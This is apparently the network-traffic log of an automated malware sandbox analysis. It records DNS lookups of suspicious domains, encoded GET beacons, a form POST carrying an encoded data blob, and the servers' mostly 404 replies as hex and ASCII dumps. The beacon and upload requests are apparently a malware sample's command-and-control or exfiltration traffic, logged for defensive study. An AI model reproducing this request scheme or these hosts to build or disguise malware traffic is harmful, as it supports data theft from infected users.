                Source: global trafficHTTP traffic detected: GET /725g/?9PZt=uiAekWsFoddhMu9w6av3IR3qRfkxEYhiHCdKsu6SwDAva+OcXfn0u3hNB8zZhz0kzkOslwZXAdf6Zktj+FCGjzQZh9bjjklx+lq67asD3Aqsp6I0O3QatHKxujksh8AYT18lk1s=&I8A=fF8h_X3X0TB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.dietcoffee.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /v2ut/?I8A=fF8h_X3X0TB&9PZt=RylwLg2ZpVS2rFdSlQee5TIAL9VVjaBtzTw+4qXkIOieMIxPna2x473GB7GRuoZi44HZ9KZH1KJCd6HB3lVLIzhxo/qMOX8MgFiq9bThHJniXb4lO04jER0alxiz9odaEmB/xSI= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.guacamask.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /qt4m/?9PZt=/ZQwF7Ip71YCaUlU/jTQ7l2Lp/ZTQN44rx1LzCy9bB7kVb+FnyrErN7h2wh6V0uCxKMxAv7qgoDPyMkbBqZLKSqD3jYvFd9V+3GHQAeGdc6B9Gg3Jsv2Vj+r5nwJfwG+iPE84zU=&I8A=fF8h_X3X0TB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.appsolucao.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficDNS traffic detected: DNS query: www.7261ltajbc.bond
                Source: global trafficDNS traffic detected: DNS query: www.muasamgiare.click
                Source: global trafficDNS traffic detected: DNS query: www.kkpmoneysocial.top
                Source: global trafficDNS traffic detected: DNS query: www.artkub.net
                Source: global trafficDNS traffic detected: DNS query: www.happyjam.life
                Source: global trafficDNS traffic detected: DNS query: www.123hellodrive.shop
                Source: global trafficDNS traffic detected: DNS query: www.zoomlive.live
                Source: global trafficDNS traffic detected: DNS query: www.dietcoffee.online
                Source: global trafficDNS traffic detected: DNS query: www.guacamask.online
                Source: global trafficDNS traffic detected: DNS query: www.appsolucao.shop
                Source: global trafficDNS traffic detected: DNS query: www.aziziyeescortg.xyz
                Source: unknownHTTP traffic detected: POST /bsye/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.muasamgiare.clickCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 209Connection: closeOrigin: http://www.muasamgiare.clickReferer: http://www.muasamgiare.click/bsye/User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20Data Raw: 39 50 5a 74 3d 72 65 50 77 37 6d 4a 50 72 72 43 43 4b 57 55 2f 4e 7a 4e 49 41 6a 69 41 6f 6d 6a 5a 31 73 64 4b 41 45 79 49 51 58 79 35 4f 43 75 76 75 59 30 6f 62 46 46 45 61 46 6d 6e 69 7a 61 33 70 48 39 58 72 6f 4d 48 39 57 65 7a 59 73 58 48 74 5a 63 46 56 78 2b 38 63 7a 38 68 4f 31 71 46 6d 7a 41 58 6c 61 38 74 59 64 59 68 4e 73 66 6c 70 64 35 73 36 6b 42 56 71 35 68 4e 78 68 52 53 45 51 63 34 30 6c 4b 36 4a 6f 73 38 50 77 6a 65 66 50 42 6a 4e 46 78 4e 33 34 43 4d 37 48 32 78 71 6d 43 4b 34 56 44 76 4b 4d 57 62 46 45 41 2f 4b 50 6e 34 32 4b 2f 56 4a 5a 33 59 4b 62 56 53 42 45 72 4e 4f 54 4d 4b 6b 51 44 4f 42 4b 4e 31 Data Ascii: 9PZt=rePw7mJPrrCCKWU/NzNIAjiAomjZ1sdKAEyIQXy5OCuvuY0obFFEaFmniza3pH9XroMH9WezYsXHtZcFVx+8cz8hO1qFmzAXla8tYdYhNsflpd5s6kBVq5hNxhRSEQc40lK6Jos8PwjefPBjNFxN34CM7H2xqmCK4VDvKMWbFEA/KPn42K/VJZ3YKbVSBErNOTMKkQDOBKN1
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 03:25:15 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 03:26:07 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 03:26:09 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 03:26:12 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 03:26:15 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: nginxDate: Sat, 11 Jan 2025 03:31:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Sat, 11 Jan 2025 03:26:49 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 35 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb 2c 12 8c 97 a6 07 f9 89 24 88 c4 d4 83 47 4c ab 25 41 8a b4 68 7c 7b 0b 5c 3c ce ce cc 37 4b 57 c9 29 e6 d7 2a 85 03 3f 16 50 5d f6 45 1e 83 b7 46 cc 53 9e 21 26 3c 59 9c d0 0f 10 d3 d2 63 84 2a fb 6c 19 55 b2 16 4e d8 c6 b6 92 45 41 04 a5 b6 90 e9 b1 13 14 97 23 a1 38 87 e8 4d 8b ef d4 db b0 bf 8c 53 84 f6 8c 2b 09 83 7c 8d d2 58 29 e0 72 2e 00 77 e1 f6 81 f0 a9 0d 74 0e 79 9f 90 a0 3b b0 aa 31 60 e4 f0 96 83 4f b1 77 6d 9c c1 6e 65 7a 88 fc 00 4e 5b 37 b5 cb 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b5M0},$GL%Ah|{\<7KW)*?P]EFS!&<Yc*lUNEA#8MS+|X)r.wty;1`OwmnezN[70
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Sat, 11 Jan 2025 03:26:52 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 35 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb 2c 12 8c 97 a6 07 f9 89 24 88 c4 d4 83 47 4c ab 25 41 8a b4 68 7c 7b 0b 5c 3c ce ce cc 37 4b 57 c9 29 e6 d7 2a 85 03 3f 16 50 5d f6 45 1e 83 b7 46 cc 53 9e 21 26 3c 59 9c d0 0f 10 d3 d2 63 84 2a fb 6c 19 55 b2 16 4e d8 c6 b6 92 45 41 04 a5 b6 90 e9 b1 13 14 97 23 a1 38 87 e8 4d 8b ef d4 db b0 bf 8c 53 84 f6 8c 2b 09 83 7c 8d d2 58 29 e0 72 2e 00 77 e1 f6 81 f0 a9 0d 74 0e 79 9f 90 a0 3b b0 aa 31 60 e4 f0 96 83 4f b1 77 6d 9c c1 6e 65 7a 88 fc 00 4e 5b 37 b5 cb 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b5M0},$GL%Ah|{\<7KW)*?P]EFS!&<Yc*lUNEA#8MS+|X)r.wty;1`OwmnezN[70
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Sat, 11 Jan 2025 03:26:54 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 35 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb 2c 12 8c 97 a6 07 f9 89 24 88 c4 d4 83 47 4c ab 25 41 8a b4 68 7c 7b 0b 5c 3c ce ce cc 37 4b 57 c9 29 e6 d7 2a 85 03 3f 16 50 5d f6 45 1e 83 b7 46 cc 53 9e 21 26 3c 59 9c d0 0f 10 d3 d2 63 84 2a fb 6c 19 55 b2 16 4e d8 c6 b6 92 45 41 04 a5 b6 90 e9 b1 13 14 97 23 a1 38 87 e8 4d 8b ef d4 db b0 bf 8c 53 84 f6 8c 2b 09 83 7c 8d d2 58 29 e0 72 2e 00 77 e1 f6 81 f0 a9 0d 74 0e 79 9f 90 a0 3b b0 aa 31 60 e4 f0 96 83 4f b1 77 6d 9c c1 6e 65 7a 88 fc 00 4e 5b 37 b5 cb 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b5M0},$GL%Ah|{\<7KW)*?P]EFS!&<Yc*lUNEA#8MS+|X)r.wty;1`OwmnezN[70
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Sat, 11 Jan 2025 03:26:57 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 203Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 37 32 35 67 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /725g/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 03:27:29 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cachecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=abixDaLA%2FAyUIyB7Gyp9r7bsVHdCfNHnxwFLzCmZcXEvvlcmZj%2FmhYVVL4VtOY7%2F%2FADde1zJkLznXDNMc%2Fc%2FjPfycCy4aH%2BSHMKmfRWXY%2FhbF8MRphsh8OPQivIXmnOfUbnN2c25nXs6"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9001cfaf0b578cda-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1761&min_rtt=1761&rtt_var=880&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=759&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 64 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 6d 8b db 38 10 fe 1e b8 ff 30 f5 52 68 21 8e ed ac c3 1d b6 63 38 da 3b 7a 50 da 85 2e 94 fb 28 5b 63 4b 54 d1 e8 a4 89 9d f4 d7 1f 72 36 fb 56 09 f4 32 1a cd cb f3 0c d3 bc f9 f8 f5 c3 fd bf 77 7f 81 e2 83 69 57 4d dc 20 f0 d9 e0 3e 51 a8 47 c5 55 91 e7 6f 93 f8 84 42 b6 ab e6 80 2c c0 8a 03 ee 93 49 e3 ec c8 73 02 3d 59 46 cb fb 64 d6 92 d5 5e e2 a4 7b 4c 97 cb 1a b4 d5 ac 85 49 43 2f 0c ee 8b 35 04 e5 b5 fd 91 32 a5 83 e6 bd a5 04 b2 76 d5 b0 66 83 2d 94 79 09 5f 88 e1 6f 3a 5a f9 db aa c9 2e f2 26 7b f0 df 91 3c 5f 23 ec c9 90 af e0 a6 2c cb 1a 0e c2 8f da 56 79 3d 90 e5 0a 2c f9 83 30 50 94 ee 94 6d 73 77 82 3f bd 16 66 0d 9f d0 4c c8 ba 17 6b 08 c2 86 34 a0 d7 43 0d cf 92 ad a1 13 fd 8f d1 c7 00 d2 ab 8b 61 18 ea 88 82 d4 d3 2b 7c c4 91 a9 86 83 b6 e9 0b 1b 49 0b 71 3c ff c0 78 e2 54 18 3d da 0a 7a b4 8c be 86 05 a3 ea 8f 3c 77 a7 6b 0a a9 c1 81 2b 48 cb 8b d0 51 d0 ac c9 56 a2 0b 64 8e 8c 35 30 b9 0a 6e a3 97 45 75 97 bf 8d b1 c1 c3 68 54 71 Data Ascii: 2d0dTm80Rh!c8;zP.([cKTr6V2wiWM >QGUoB,Is=YFd^{LIC/52vf-y_o:Z.&{<_#,Vy=,0Pmsw?fLk4Ca+|Iq<xT=z<wk+HQVd50nEuhTq
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 03:27:31 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cachecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IWKTe%2BVKrs8SVuEO1Qixa5Z3DhIs65kYAaMdydSsU%2BEjmJAz1uuiCdHr0tAeoY7l1x1LpMhl5WSYp%2FJAEAmUdbbI3SHT88DvbS6w%2BgPLktX%2BxNIUd1MfjqMaKGx4M7wCmauc9uiEhd96"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9001cfbeee308cda-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1783&min_rtt=1783&rtt_var=891&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=783&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 64 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 6d 8b db 38 10 fe 1e b8 ff 30 f5 52 68 21 8e ed ac c3 1d b6 63 38 da 3b 7a 50 da 85 2e 94 fb 28 5b 63 4b 54 d1 e8 a4 89 9d f4 d7 1f 72 36 fb 56 09 f4 32 1a cd cb f3 0c d3 bc f9 f8 f5 c3 fd bf 77 7f 81 e2 83 69 57 4d dc 20 f0 d9 e0 3e 51 a8 47 c5 55 91 e7 6f 93 f8 84 42 b6 ab e6 80 2c c0 8a 03 ee 93 49 e3 ec c8 73 02 3d 59 46 cb fb 64 d6 92 d5 5e e2 a4 7b 4c 97 cb 1a b4 d5 ac 85 49 43 2f 0c ee 8b 35 04 e5 b5 fd 91 32 a5 83 e6 bd a5 04 b2 76 d5 b0 66 83 2d 94 79 09 5f 88 e1 6f 3a 5a f9 db aa c9 2e f2 26 7b f0 df 91 3c 5f 23 ec c9 90 af e0 a6 2c cb 1a 0e c2 8f da 56 79 3d 90 e5 0a 2c f9 83 30 50 94 ee 94 6d 73 77 82 3f bd 16 66 0d 9f d0 4c c8 ba 17 6b 08 c2 86 34 a0 d7 43 0d cf 92 ad a1 13 fd 8f d1 c7 00 d2 ab 8b 61 18 ea 88 82 d4 d3 2b 7c c4 91 a9 86 83 b6 e9 0b 1b 49 0b 71 3c ff c0 78 e2 54 18 3d da 0a 7a b4 8c be 86 05 a3 ea 8f 3c 77 a7 6b 0a a9 c1 81 2b 48 cb 8b d0 51 d0 ac c9 56 a2 0b 64 8e 8c 35 30 b9 0a 6e a3 97 45 75 97 bf 8d b1 c1 c3 68 54 71 f5 f8 88 09 44 50 Data Ascii: 2d0dTm80Rh!c8;zP.([cKTr6V2wiWM >QGUoB,Is=YFd^{LIC/52vf-y_o:Z.&{<_#,Vy=,0Pmsw?fLk4Ca+|Iq<xT=z<wk+HQVd50nEuhTqDP
